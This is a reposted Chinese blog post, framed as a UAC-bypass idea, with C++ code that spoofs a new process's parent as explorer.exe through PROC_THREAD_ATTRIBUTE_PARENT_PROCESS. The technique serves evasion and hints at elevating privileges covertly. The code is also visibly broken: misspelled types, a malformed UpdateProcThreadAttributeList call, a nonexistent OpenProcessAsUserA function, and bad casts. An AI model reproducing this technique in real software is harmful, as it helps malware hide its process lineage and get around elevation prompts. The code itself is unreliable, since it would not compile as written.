在MSDN中介绍的,如果是CreateProcessAsUser 的dwCreationFlags 的参数被设置为EXTENDED_STARTUPINFO_PRESENT, 这就是有扩展启动信息的结构体, 这里的IpStartupInfo参数需要填好STARTUPEX 结构,这个结构由STARTUOINFO结构和PROC_THREAD_ATTRIBUTE_LIST 指针构成:
typedef struct _STARTUPINFOEX {
STARTUPINFO StartupInfo;
PPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;
} STARTUPINFOEX, *LPSTARTUPINFOEX;
DWORD pid = 0;
/* 根据进程名获取任意进程Id */
GetProcessIdByName(L"explorer.exe",&pid);
/* 已全部权限打开explorer.exe 进程 */
HANDLE handle = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pid);
cout << "PID:" << pid << endl << "Handle:" << handle << endl;
/* 创建启动信息结构体 */
STARTUPOINFOEXA si;
/* 初始化结构体 */
ZeroMemory(&si,sizeof(si));
/* 设置结构体成员 */
si.StartupInfo.cb = sizeof(si);
SIZE_T lpsize = 0;
/* 用微软规定的特定的函数初始化结构体 */
InitializeProcThreadAttributeList(NULL,1,0,&lpsize);
char * temp = new char[lpsize];
/* 转换指针到正确类型 */
LPPROC_THREAD_ATTRIBUTE_LIST AttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)temp;
/* 真正为结构体初始化属性参数 */
InitializeProcThreadAttributeList(AttributeList,1,0,&lpsize);
/* 用已构造的属性结构体更新属性表 */
if (!UpdateProcThreadAttributeList,0,PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &handle,sizeof(HANDLE),NULL,NULL)
{
cout << "Fail to update attributes" << endl;
}
/* 移交指针,这里已更换了父进程的属性表是 explorer.exe */
si.lpAttributeList = AttributeList;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
# ifdef ADMIN
HANDLE Token;
/* 这里的token需要修改,如果在启动如注册表等时,并且要右键管理员形式启动(这个过程可以程序实现,你懂的!!!) */
OpenProcessAsUserA(Token, 0 , "regedit.exe", 0, 0, 0, EXTENDED_STARTUPINFO_PRESENT,0, 0, (LPSTARTUPINFOA)&si, &pi);
# else
if (CreateProcessAsUserA(NULL,0,"calc.exe",0, 0, 0, EXTENDED_STARTUPINFO_PRESENT,0, 0, (LPSTARTUPINFOA),&si, &pi))
# endif
{
cout << "Process started" << endl;
}
else
{
cout << "Error code:" << GetLastError() << endl;
}
/* 处理后事 */
DeleteProcThreadAttributeList(AttributeList);
delete temp;关于父进程和子进程的关系(UAC 绕过思路),布布扣,bubuko.com
原文:http://blog.csdn.net/l_f0rm4t3d/article/details/25567463